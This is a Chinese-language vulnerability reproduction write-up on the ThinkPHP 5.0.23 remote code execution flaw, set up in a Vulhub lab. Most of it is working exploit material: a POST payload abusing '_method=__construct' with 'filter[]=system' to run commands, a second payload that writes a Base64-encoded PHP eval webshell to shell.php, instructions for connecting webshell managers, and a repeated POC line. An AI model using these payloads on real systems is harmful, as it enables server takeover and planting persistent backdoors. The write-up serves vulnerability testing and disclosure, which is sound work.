ThinkPHP 5.0.23 远程代码执行

• 一、 漏洞描述
• 二、漏洞影响
• 三、漏洞复现
• • 1、 环境搭建
  • 2、 漏洞复现
• 四、漏洞POC
• 五、参考链接
• 六、利用工具

一、 漏洞描述

ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中，获取 method 的方法中没有正确处理方法名，导致攻击者可以调用 Request 类任意方法并构造利用链，从而导致远程代码执行漏洞。

二、漏洞影响

ThinkPHP <= 5.0.24

三、漏洞复现

1、 环境搭建

使用 Vulhub 在服务器上搭建

cd /vulhub/thinkphp/5.0.23-rce
docker-compose up -d

访问127.0.0.1:8080，进入到主页面：

2、 漏洞复现

第一步：判断是否存在漏洞：
访问/index.php?s=captcha页面，会出现如下报错：

使用 Google Chrome 的 HackBar 插件发送 POST 请求：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

得到回显：

whoami 命令成功执行。

第二步：漏洞利用
通过echo命令写入 Webshell 文件
首先将一句话木马进行 Base64 编码：

发送 POST 请求：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php

访问shell.php:

可以发现一句话木马已经被解析，使用蚁剑、菜刀等 Webshell 管理工具连接：

四、漏洞POC

测试路径：

index.php?s=captcha

POST 传餐：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

五、参考链接

https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
https://www.dazhuanlan.com/2019/12/05/5de818364c3ac/

六、利用工具

TPscan